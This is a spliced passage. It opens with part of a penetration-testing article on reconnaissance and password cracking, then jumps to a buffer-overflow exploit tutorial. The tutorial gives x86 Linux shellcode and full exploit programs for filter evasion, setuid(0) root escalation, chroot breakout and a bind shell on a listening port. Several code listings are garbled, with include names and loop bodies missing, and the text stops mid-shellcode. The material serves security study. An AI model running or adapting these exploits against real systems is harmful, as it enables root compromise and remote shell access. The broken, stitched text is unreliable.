by both internal information systems security (InfoSec) staff and consultancies have branched out. We have put together such a venture. Our team attempts to penetrate a system or an organization's network by taking on the role of attacker. Using an external attack approach, the team typically performs "zero-knowledge" attacks, meaning the team is given only the name of the target organization. Sometimes the client provides th e team with the names or the types of systems or information management is most concerned about. Targets can include payroll and human resources departments, fund transfers, proprietary data (such as product designs and source code) and customer databases. The clients are varied: manufacturing, health care and pharmaceuticals companies and major financial institutions. Here we discuss our attack and intrusion-detection procedures and offer an approach to intrusion prevention. In addition, we present the methodology used to analyze individual system security and show you how to strengthen intrusion detection using commonly available tools. For more specific information concerning the attack systems and tools used, see "Test Systems and Tools" and "Specific System Attack," on Network Computing Online at www.NetworkComputing.com/815/815ws1.html. Playing the Hacker Our methodology of attack is similar to that of a would-be attacker. It begins with exploring and mapping the target organization's Internet connections. We start with whois queries to the Internet Network Information Center (InterNIC) to determine domain information, namely Domain Name System (DNS) servers. We attempt to map the internal network topology using DNS queries. Typically, we request a DNS zone transfer from the organization's authoritative name servers. Although most commercial firewalls can block this type of probe, a surprising number of organizations don't implement the block. Next, using traceroute, we try to uncover possible candidates for a firewall host or packet-filtering router, which would reveal itself as the last hop before our probe packets begin to get dropped. We make a note of this machine's address for reference. With the DNS zone transfers as a guide, we attempt to find supposedly untrusted machines, just outside the firewall. Most administrators are not overly concerned with security on external machines because these are considered sacrificial machines, relegated to a demilitarized zone. However, th ese same administrators open their firewalls to permit any type of network traffic coming from these sacrificial machines to connect to machines behind the firewall--either as a convenience to themselves or because of an oversight. Another problem we see all too frequently is that the untrusted DNS server, though outside the firewall, contains the organization's complete DNS maps. Properly configured, it should contain maps only for those hosts that the Internet-at-large needs to know about, such as the DNS server, the external mail gateway, and possibly, the company's Web site. Using strobe to perform port scans on these external machines, we can note any and all system services that can be reached for possible exploitation. If we are successful at breaking into any of these machines on the outside of the firewall, we make note of all valid user names in the password file and see if there are any machines mentioned in the hosts file that weren't listed in our DNS maps. If we obtain "super-user" access, we run crack, a Unix-based password decoder, on the shadowed password file, in anticipation that these same logins and passwords also exist on other machines. We've found that crack does some rather extensive dictionary attacks on people's encrypted passwords and generally has a high rate of success. In some cases, the password file isn't even shadowed, and super-user access isn't required to get at the encrypted passwords. @HWA 34.0 Advanced buffer overflow exploit Written by Taeho Oh ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Taeho Oh ------------------------------------------------------------------------------- ------------------------------------------------------------------------------- ------------------------------------------------------------------------------- Advanced buffer overflow exploit Written by Taeho Oh ( ohhara@postech.edu ) ---------------------------------------------------------------------------- Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug ---------------------------------------------------------------------------- 1. Introduction Nowadays there are many buffer overflow exploit codes. The early buffer overflow exploit codes only spawn a shell ( execute /bin/sh ). However, nowadays some of the buffer overflow exploit codes have very nice features. For example, passing through filtering, opening a socket, breaking chroot, and so on. This paper will attempt to explain the advanced buffer overflow exploit skill under intel x86 linux. 2. What do you have to know before reading? You have to know assembly language, C language, and Linux. Of course, you have to know what buffer overflow is. You can get the information of the buffer overflow in phrack 49-14 ( Smashing The Stack For Fun And Profit by Aleph1 ). It is a wonderful paper of buffer overflow and I highly recommend you to read that before reading this one. 3. Pass through filtering There are many programs which has buffer overflow problems. Why are not the all buffer overflow problems exploited? Because even if a program has a buffer overflow condition, it can be hard to exploit. In many cases, the reason is that the program filters some characters or converts characters into other characters. If the program filters all non printable characters, it's too hard to exploit. If the program filters some of characters, you can pass through the filter by making good buffer overflow exploit code. :) 3.1 The example vulnerable program vulnerable1.c ---------------------------------------------------------------------------- #include #include int main(int argc,int **argv) { char buffer[1024]; int i; if(argc>1) { for(i=0;i #include #define ALIGN 0 #define OFFSET 0 #define RET_POSITION 1024 #define RANGE 20 #define NOP 0x90 char shellcode[]= "\xeb\x38" /* jmp 0x38 */ "\x5e" /* popl %esi */ "\x80\x46\x01\x50" /* addb $0x50,0x1(%esi) */ "\x80\x46\x02\x50" /* addb $0x50,0x2(%esi) */ "\x80\x46\x03\x50" /* addb $0x50,0x3(%esi) */ "\x80\x46\x05\x50" /* addb $0x50,0x5(%esi) */ "\x80\x46\x06\x50" /* addb $0x50,0x6(%esi) */ "\x89\xf0" /* movl %esi,%eax */ "\x83\xc0\x08" /* addl $0x8,%eax */ "\x89\x46\x08" /* movl %eax,0x8(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %eax,0x7(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int $0x80 */ "\xe8\xc3\xff\xff\xff" /* call -0x3d */ "\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh" */ /* /bin/sh is disguised */ unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } main(int argc,char **argv) { char buff[RET_POSITION+RANGE+ALIGN+1],*ptr; long addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1; int i; if(argc>1) offset=atoi(argv[1]); sp=get_sp(); addr=sp-offset; for(i=0;i>8; buff[i+ALIGN+2]=(addr&0x00ff0000)>>16; buff[i+ALIGN+3]=(addr&0xff000000)>>24; } for(i=0;i #include int main(int argc,char **argv) { char buffer[1024]; seteuid(getuid()); if(argc>1) strcpy(buffer,argv[1]); } ---------------------------------------------------------------------------- This vulnerable program calls seteuid(getuid()) at start. Therefore, you may think that "strcpy(buffer,argv[1]);" is OK. Because you can only get your own shell although you succeed in buffer overflow attack. However, if you insert a code which calls setuid(0) in the shellcode, you can get root shell. :) 4.2 Make setuid(0) code setuidasm.c ---------------------------------------------------------------------------- main() { setuid(0); } ---------------------------------------------------------------------------- compile and disassemble ---------------------------------------------------------------------------- [ ohhara@ohhara ~ ] {1} $ gcc -o setuidasm -static setuidasm.c [ ohhara@ohhara ~ ] {2} $ gdb setuidasm GNU gdb 4.17 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... (gdb) disassemble setuid Dump of assembler code for function __setuid: 0x804ca00 <__setuid>: movl %ebx,%edx 0x804ca02 <__setuid+2>: movl 0x4(%esp,1),%ebx 0x804ca06 <__setuid+6>: movl $0x17,%eax 0x804ca0b <__setuid+11>: int $0x80 0x804ca0d <__setuid+13>: movl %edx,%ebx 0x804ca0f <__setuid+15>: cmpl $0xfffff001,%eax 0x804ca14 <__setuid+20>: jae 0x804cc10 <__syscall_error> 0x804ca1a <__setuid+26>: ret 0x804ca1b <__setuid+27>: nop 0x804ca1c <__setuid+28>: nop 0x804ca1d <__setuid+29>: nop 0x804ca1e <__setuid+30>: nop 0x804ca1f <__setuid+31>: nop End of assembler dump. (gdb) ---------------------------------------------------------------------------- setuid(0); code ---------------------------------------------------------------------------- char code[]= "\x31\xc0" /* xorl %eax,%eax */ "\x31\xdb" /* xorl %ebx,%ebx */ "\xb0\x17" /* movb $0x17,%al */ "\xcd\x80"; /* int $0x80 */ ---------------------------------------------------------------------------- 4.3 Modify the normal shellcode Making new shellcode is very easy if you make setuid(0) code. Just insert the code into the start of the normal shellcode. new shellcode ---------------------------------------------------------------------------- char shellcode[]= "\x31\xc0" /* xorl %eax,%eax */ "\x31\xdb" /* xorl %ebx,%ebx */ "\xb0\x17" /* movb $0x17,%al */ "\xcd\x80" /* int $0x80 */ "\xeb\x1f" /* jmp 0x1f */ "\x5e" /* popl %esi */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %eax,0x7(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int $0x80 */ "\xe8\xdc\xff\xff\xff" /* call -0x24 */ "/bin/sh"; /* .string \"/bin/sh\" */ ---------------------------------------------------------------------------- 4.4 Exploit vulnerable2 program With this shellcode, you can make an exploit code easily. exploit2.c ---------------------------------------------------------------------------- #include #include #define ALIGN 0 #define OFFSET 0 #define RET_POSITION 1024 #define RANGE 20 #define NOP 0x90 char shellcode[]= "\x31\xc0" /* xorl %eax,%eax */ "\x31\xdb" /* xorl %ebx,%ebx */ "\xb0\x17" /* movb $0x17,%al */ "\xcd\x80" /* int $0x80 */ "\xeb\x1f" /* jmp 0x1f */ "\x5e" /* popl %esi */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %eax,0x7(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int $0x80 */ "\xe8\xdc\xff\xff\xff" /* call -0x24 */ "/bin/sh"; /* .string \"/bin/sh\" */ unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc,char **argv) { char buff[RET_POSITION+RANGE+ALIGN+1],*ptr; long addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1; int i; if(argc>1) offset=atoi(argv[1]); sp=get_sp(); addr=sp-offset; for(i=0;i>8; buff[i+ALIGN+2]=(addr&0x00ff0000)>>16; buff[i+ALIGN+3]=(addr&0xff000000)>>24; } for(i=0;i #include int main(int argc,char **argv) { char buffer[1024]; chroot("/home/ftp"); chdir("/"); if(argc>1) strcpy(buffer,argv[1]); } ---------------------------------------------------------------------------- If you tries to execute "/bin/sh" with buffer overflow, it may executes "/home/ftp/bin/sh" ( if it exists ) and you cannot access the other directories except for "/home/ftp". 5.2 Make break chroot code If you can execute below code, you can break chroot. breakchrootasm.c ---------------------------------------------------------------------------- main() { mkdir("sh",0755); chroot("sh"); /* many "../" */ chroot("../../../../../../../../../../../../../../../../"); } ---------------------------------------------------------------------------- This break chroot code makes "sh" directory, because it's easy to reference. ( it's also used to execute "/bin/sh" ) compile and disassemble ---------------------------------------------------------------------------- [ ohhara@ohhara ~ ] {1} $ gcc -o breakchrootasm -static breakchrootasm.c [ ohhara@ohhara ~ ] {2} $ gdb breakchrootasm GNU gdb 4.17 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... (gdb) disassemble mkdir Dump of assembler code for function __mkdir: 0x804cac0 <__mkdir>: movl %ebx,%edx 0x804cac2 <__mkdir+2>: movl 0x8(%esp,1),%ecx 0x804cac6 <__mkdir+6>: movl 0x4(%esp,1),%ebx 0x804caca <__mkdir+10>: movl $0x27,%eax 0x804cacf <__mkdir+15>: int $0x80 0x804cad1 <__mkdir+17>: movl %edx,%ebx 0x804cad3 <__mkdir+19>: cmpl $0xfffff001,%eax 0x804cad8 <__mkdir+24>: jae 0x804cc40 <__syscall_error> 0x804cade <__mkdir+30>: ret 0x804cadf <__mkdir+31>: nop End of assembler dump. (gdb) disassemble chroot Dump of assembler code for function chroot: 0x804cb60 : movl %ebx,%edx 0x804cb62 : movl 0x4(%esp,1),%ebx 0x804cb66 : movl $0x3d,%eax 0x804cb6b : int $0x80 0x804cb6d : movl %edx,%ebx 0x804cb6f : cmpl $0xfffff001,%eax 0x804cb74 : jae 0x804cc40 <__syscall_error> 0x804cb7a : ret 0x804cb7b : nop 0x804cb7c : nop 0x804cb7d : nop 0x804cb7e : nop 0x804cb7f : nop End of assembler dump. (gdb) ---------------------------------------------------------------------------- mkdir("sh",0755); code ---------------------------------------------------------------------------- /* mkdir first argument is %ebx and second argument is */ /* %ecx. */ char code[]= "\x31\xc0" /* xorl %eax,%eax */ "\x31\xc9" /* xorl %ecx,%ecx */ "\xb0\x17" /* movb $0x27,%al */ "\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */ /* %esi has to reference "/bin/sh" before using this */ /* instruction. This instruction load address of "sh" */ /* and store at %ebx */ "\xfe\xc5" /* incb %ch */ /* %cx = 0000 0001 0000 0000 */ "\xb0\x3d" /* movb $0xed,%cl */ /* %cx = 0000 0001 1110 1101 */ /* %cx = 000 111 101 101 */ /* %cx = 0 7 5 5 */ "\xcd\x80"; /* int $0x80 */ ---------------------------------------------------------------------------- chroot("sh"); code ---------------------------------------------------------------------------- /* chroot first argument is ebx */ char code[]= "\x31\xc0" /* xorl %eax,%eax */ "\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */ "\xb0\x3d" /* movb $0x3d,%al */ "\xcd\x80"; /* int $0x80 */ ---------------------------------------------------------------------------- chroot("../../../../../../../../../../../../../../../../"); code ---------------------------------------------------------------------------- char code[]= "\xbb\xd2\xd1\xd0\xff" /* movl $0xffd0d1d2,%ebx */ /* disguised "../" character string */ "\xf7\xdb" /* negl %ebx */ /* %ebx = $0x002f2e2e */ /* intel x86 is little endian. */ /* %ebx = "../" */ "\x31\xc9" /* xorl %ecx,%ecx */ "\xb1\x10" /* movb $0x10,%cl */ /* prepare for looping 16 times. */ "\x56" /* pushl %esi */ /* backup current %esi. %esi has the pointer of */ /* "/bin/sh". */ "\x01\xce" /* addl %ecx,%esi */ "\x89\x1e" /* movl %ebx,(%esi) */ "\x83\xc6\x03" /* addl $0x3,%esi */ "\xe0\xf9" /* loopne -0x7 */ /* make "../../../../ . . . " character string at */ /* 0x10(%esi) by looping. */ "\x5e" /* popl %esi */ /* restore %esi. */ "\xb0\x3d" /* movb $0x3d,%al */ "\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */ /* %ebx has the address of "../../../../ . . . ". */ "\xcd\x80"; /* int $0x80 */ ---------------------------------------------------------------------------- 5.3 Modify the normal shellcode Making new shellcode is very easy if you make break chroot code. Just insert the code into the start of the normal shellcode and modify jmp and call argument. new shellcode ---------------------------------------------------------------------------- char shellcode[]= "\xeb\x4f" /* jmp 0x4f */ "\x31\xc0" /* xorl %eax,%eax */ "\x31\xc9" /* xorl %ecx,%ecx */ "\x5e" /* popl %esi */ "\x88\x46\x07" /* movb %al,0x7(%esi) */ "\xb0\x27" /* movb $0x27,%al */ "\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */ "\xfe\xc5" /* incb %ch */ "\xb1\xed" /* movb $0xed,%cl */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */ "\xb0\x3d" /* movb $0x3d,%al */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\xbb\xd2\xd1\xd0\xff" /* movl $0xffd0d1d2,%ebx */ "\xf7\xdb" /* negl %ebx */ "\x31\xc9" /* xorl %ecx,%ecx */ "\xb1\x10" /* movb $0x10,%cl */ "\x56" /* pushl %esi */ "\x01\xce" /* addl %ecx,%esi */ "\x89\x1e" /* movl %ebx,(%esi) */ "\x83\xc6\x03" /* addl %0x3,%esi */ "\xe0\xf9" /* loopne -0x7 */ "\x5e" /* popl %esi */ "\xb0\x3d" /* movb $0x3d,%al */ "\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\xe8\xac\xff\xff\xff" /* call -0x54 */ "/bin/sh"; /* .string \"/bin/sh\" */ ---------------------------------------------------------------------------- 5.4 Exploit vulnerable3 program With this shellcode, you can make an exploit code easily. exploit3.c ---------------------------------------------------------------------------- #include #include #define ALIGN 0 #define OFFSET 0 #define RET_POSITION 1024 #define RANGE 20 #define NOP 0x90 char shellcode[]= "\xeb\x4f" /* jmp 0x4f */ "\x31\xc0" /* xorl %eax,%eax */ "\x31\xc9" /* xorl %ecx,%ecx */ "\x5e" /* popl %esi */ "\x88\x46\x07" /* movb %al,0x7(%esi) */ "\xb0\x27" /* movb $0x27,%al */ "\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */ "\xfe\xc5" /* incb %ch */ "\xb1\xed" /* movb $0xed,%cl */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */ "\xb0\x3d" /* movb $0x3d,%al */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\xbb\xd2\xd1\xd0\xff" /* movl $0xffd0d1d2,%ebx */ "\xf7\xdb" /* negl %ebx */ "\x31\xc9" /* xorl %ecx,%ecx */ "\xb1\x10" /* movb $0x10,%cl */ "\x56" /* pushl %esi */ "\x01\xce" /* addl %ecx,%esi */ "\x89\x1e" /* movl %ebx,(%esi) */ "\x83\xc6\x03" /* addl %0x3,%esi */ "\xe0\xf9" /* loopne -0x7 */ "\x5e" /* popl %esi */ "\xb0\x3d" /* movb $0x3d,%al */ "\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\xe8\xac\xff\xff\xff" /* call -0x54 */ "/bin/sh"; /* .string \"/bin/sh\" */ unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc,char **argv) { char buff[RET_POSITION+RANGE+ALIGN+1],*ptr; long addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1; int i; if(argc>1) offset=atoi(argv[1]); sp=get_sp(); addr=sp-offset; for(i=0;i>8; buff[i+ALIGN+2]=(addr&0x00ff0000)>>16; buff[i+ALIGN+3]=(addr&0xff000000)>>24; } for(i=0;i int main(int argc,char **argv) { char buffer[1024]; if(argc>1) strcpy(buffer,argv[1]); } ---------------------------------------------------------------------------- This is standard vulnerable program. I will use this for socket opening buffer overflow. Because I am too lazy to make a example daemon program. :) However, after you see the code, you will not be disappointed. 6.2 Make open socket code If you can execute below code, you can open a socket. opensocketasm1.c ---------------------------------------------------------------------------- #include #include #include int soc,cli,soc_len; struct sockaddr_in serv_addr; struct sockaddr_in cli_addr; int main() { if(fork()==0) { serv_addr.sin_family=AF_INET; serv_addr.sin_addr.s_addr=htonl(INADDR_ANY); serv_addr.sin_port=htons(30464); soc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); bind(soc,(struct sockaddr *)&serv_addr,sizeof(serv_addr)); listen(soc,1); soc_len=sizeof(cli_addr); cli=accept(soc,(struct sockaddr *)&cli_addr,&soc_len); dup2(cli,0); dup2(cli,1); dup2(cli,2); execl("/bin/sh","sh",0); } } ---------------------------------------------------------------------------- It's difficult to make with assembly language. You can make this program simple. opensocketasm2.c ---------------------------------------------------------------------------- #include #include #include int soc,cli; struct sockaddr_in serv_addr; int main() { if(fork()==0) { serv_addr.sin_family=2; serv_addr.sin_addr.s_addr=0; serv_addr.sin_port=0x77; soc=socket(2,1,6); bind(soc,(struct sockaddr *)&serv_addr,0x10); listen(soc,1); cli=accept(soc,0,0); dup2(cli,0); dup2(cli,1); dup2(cli,2); execl("/bin/sh","sh",0); } } ---------------------------------------------------------------------------- compile and disassemble ---------------------------------------------------------------------------- [ ohhara@ohhara ~ ] {1} $ gcc -o opensocketasm2 -static opensocketasm2.c [ ohhara@ohhara ~ ] {2} $ gdb opensocketasm2 GNU gdb 4.17 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... (gdb) disassemble fork Dump of assembler code for function fork: 0x804ca90 : movl $0x2,%eax 0x804ca95 : int $0x80 0x804ca97 : cmpl $0xfffff001,%eax 0x804ca9c : jae 0x804cdc0 <__syscall_error> 0x804caa2 : ret 0x804caa3 : nop 0x804caa4 : nop 0x804caa5 : nop 0x804caa6 : nop 0x804caa7 : nop 0x804caa8 : nop 0x804caa9 : nop 0x804caaa : nop 0x804caab : nop 0x804caac : nop 0x804caad : nop 0x804caae : nop 0x804caaf : nop End of assembler dump. (gdb) disassemble socket Dump of assembler code for function socket: 0x804cda0 : movl %ebx,%edx 0x804cda2 : movl $0x66,%eax 0x804cda7 : movl $0x1,%ebx 0x804cdac : leal 0x4(%esp,1),%ecx 0x804cdb0 : int $0x80 0x804cdb2 : movl %edx,%ebx 0x804cdb4 : cmpl $0xffffff83,%eax 0x804cdb7 : jae 0x804cdc0 <__syscall_error> 0x804cdbd : ret 0x804cdbe : nop 0x804cdbf : nop End of assembler dump. (gdb) disassemble bind Dump of assembler code for function bind: 0x804cd60 : movl %ebx,%edx 0x804cd62 : movl $0x66,%eax 0x804cd67 : movl $0x2,%ebx 0x804cd6c : leal 0x4(%esp,1),%ecx 0x804cd70 : int $0x80 0x804cd72 : movl %edx,%ebx 0x804cd74 : cmpl $0xffffff83,%eax 0x804cd77 : jae 0x804cdc0 <__syscall_error> 0x804cd7d : ret 0x804cd7e : nop 0x804cd7f : nop End of assembler dump. (gdb) disassemble listen Dump of assembler code for function listen: 0x804cd80 : movl %ebx,%edx 0x804cd82 : movl $0x66,%eax 0x804cd87 : movl $0x4,%ebx 0x804cd8c : leal 0x4(%esp,1),%ecx 0x804cd90 : int $0x80 0x804cd92 : movl %edx,%ebx 0x804cd94 : cmpl $0xffffff83,%eax 0x804cd97 : jae 0x804cdc0 <__syscall_error> 0x804cd9d : ret 0x804cd9e : nop 0x804cd9f : nop End of assembler dump. (gdb) disassemble accept Dump of assembler code for function __accept: 0x804cd40 <__accept>: movl %ebx,%edx 0x804cd42 <__accept+2>: movl $0x66,%eax 0x804cd47 <__accept+7>: movl $0x5,%ebx 0x804cd4c <__accept+12>: leal 0x4(%esp,1),%ecx 0x804cd50 <__accept+16>: int $0x80 0x804cd52 <__accept+18>: movl %edx,%ebx 0x804cd54 <__accept+20>: cmpl $0xffffff83,%eax 0x804cd57 <__accept+23>: jae 0x804cdc0 <__syscall_error> 0x804cd5d <__accept+29>: ret 0x804cd5e <__accept+30>: nop 0x804cd5f <__accept+31>: nop End of assembler dump. (gdb) disassemble dup2 Dump of assembler code for function dup2: 0x804cbe0 : movl %ebx,%edx 0x804cbe2 : movl 0x8(%esp,1),%ecx 0x804cbe6 : movl 0x4(%esp,1),%ebx 0x804cbea : movl $0x3f,%eax 0x804cbef : int $0x80 0x804cbf1 : movl %edx,%ebx 0x804cbf3 : cmpl $0xfffff001,%eax 0x804cbf8 : jae 0x804cdc0 <__syscall_error> 0x804cbfe : ret 0x804cbff : nop End of assembler dump. (gdb) ---------------------------------------------------------------------------- fork(); code ---------------------------------------------------------------------------- char code[]= "\x31\xc0" /* xorl %eax,%eax */ "\xb0\x02" /* movb $0x2,%al */ "\xcd\x80"; /* int $0x80 */ ---------------------------------------------------------------------------- socket(2,1,6); code ---------------------------------------------------------------------------- /* %ecx is a pointer of all arguments. */ char code[]= "\x31\xc0" /* xorl %eax,%eax */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xf1" /* movl %esi,%ecx */ "\xb0\x02" /* movb $0x2,%al */ "\x89\x06" /* movl %eax,(%esi) */ /* The first argument. */ /* %esi has reference free memory space before using */ /* this instruction. */ "\xb0\x01" /* movb $0x1,%al */ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ /* The second argument. */ "\xb0\x06" /* movb $0x6,%al */ "\x89\x46\x08" /* movl %eax,0x8(%esi) */ /* The third argument. */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x01" /* movb $0x1,%bl */ "\xcd\x80"; /* int $0x80 */ ---------------------------------------------------------------------------- bind(soc,(struct sockaddr *)&serv_addr,0x10); code ---------------------------------------------------------------------------- /* %ecx is a pointer of all arguments. */ char code[]= "\x89\xf1" /* movl %esi,%ecx */ "\x89\x06" /* movl %eax,(%esi) */ /* %eax has to have soc value before using this */ /* instruction. */ /* the first argument. */ "\xb0\x02" /* movb $0x2,%al */ "\x66\x89\x46\x0c" /* movw %ax,0xc(%esi) */ /* serv_addr.sin_family=2 */ /* 2 is stored at 0xc(%esi). */ "\xb0\x77" /* movb $0x77,%al */ "\x66\x89\x46\x0e" /* movw %ax,0xe(%esi) */ /* store port number at 0xe(%esi) */ "\x8d\x46\x0c" /* leal 0xc(%esi),%eax */ /* %eax = the address of serv_addr */ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ /* the second argument. */ "\x31\xc0" /* xorl %eax,%eax */ "\x89\x46\x10" /* movl %eax,0x10(%esi) */ /* serv_addr.sin_addr.s_addr=0 */ /* 0 is stored at 0x10(%esi). */ "\xb0\x10" /* movb $0x10,%al */ "\x89\x46\x08" /* movl %eax,0x8(%esi) */ /* the third argument. */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x02" /* movb $0x2,%bl */ "\xcd\x80"; /* int $0x80 */ ---------------------------------------------------------------------------- listen(soc,1); code ---------------------------------------------------------------------------- /* %ecx is a pointer of all arguments. */ char code[]= "\x89\xf1" /* movl %esi,%ecx */ "\x89\x06" /* movl %eax,(%esi) */ /* %eax has to have soc value before using this */ /* instruction. */ /* the first argument. */ "\xb0\x01" /* movb $0x1,%al */ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ /* the second argument. */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x04" /* movb $0x4,%bl */ "\xcd\x80"; /* int $0x80 */ ---------------------------------------------------------------------------- accept(soc,0,0); code ---------------------------------------------------------------------------- /* %ecx is a pointer of all arguments. */ char code[]= "\x89\xf1" /* movl %esi,%ecx */ "\x89\xf1" /* movl %eax,(%esi) */ /* %eax has to have soc value before using this */ /* instruction. */ /* the first argument. */ "\x31\xc0" /* xorl %eax,%eax */ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ /* the second argument. */ "\x89\x46\x08" /* movl %eax,0x8(%esi) */ /* the third argument. */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x05" /* movb $0x5,%bl */ "\xcd\x80"; /* int $0x80 */ ---------------------------------------------------------------------------- dup2(cli,0); code ---------------------------------------------------------------------------- /* the first argument is %ebx and the second argument */ /* is %ecx */ char code[]= /* %eax has to have cli value before using this */ /* instruction. */ "\x88\xc3" /* movb %al,%bl */ "\xb0\x3f" /* movb $0x3f,%al */ "\x31\xc9" /* xorl %ecx,%ecx */ "\xcd\x80"; /* int $0x80 */ ---------------------------------------------------------------------------- 6.3 Modify the normal shellcode You need some works to merge the above codes. new shellcode ---------------------------------------------------------------------------- char shellcode[]= "\x31\xc0" /* xorl %eax,%eax */ "\xb0\x02" /* movb $0x2,%al */ "\xcd\x80" /* int $0x80 */ "\x85\xc0" /* testl %eax,%eax */ "\x75\x43" /* jne 0x43 */ /* fork()!=0 case */ /* It will call exit(0) */ /* To do that, it will jump twice, because exit(0) is */ /* located so far. */ "\xeb\x43" /* jmp 0x43 */ /* fork()==0 case */ /* It will call -0xa5 */ /* To do that, it will jump twice, because call -0xa5 */ /* is located so far. */ "\x5e" /* popl %esi */ "\x31\xc0" /* xorl %eax,%eax */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xf1" /* movl %esi,%ecx */ "\xb0\x02" /* movb $0x2,%al */ "\x89\x06" /* movl %eax,(%esi) */ "\xb0\x01" /* movb $0x1,%al */ "\x89\x46\x04" /* movl %eax,0x4(%esi) */ "\xb0\x06" /* movb $0x6,%al */ "\x89\x46\x08" /* movl %eax,0x8(%esi) */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x01" /* movb $0x1,%bl */ "\xcd\x80" /* int $0x80 */ "\x89\x06" /* movl %eax,(%esi) */ "\xb0\x02" /* movb $0x2,%al */ "\x66\x89\x46\x0c" /* movw %ax,0xc(%esi) */ "\xb0\x77" /* movb $0x77,%al */ "\x66\x89\x46\x0e" /* movw %ax,0xe(%esi) */ "\x8d\x46\x0c" /* leal 0xc(%esi),%eax */ "\x89\x46\x04" /* movl 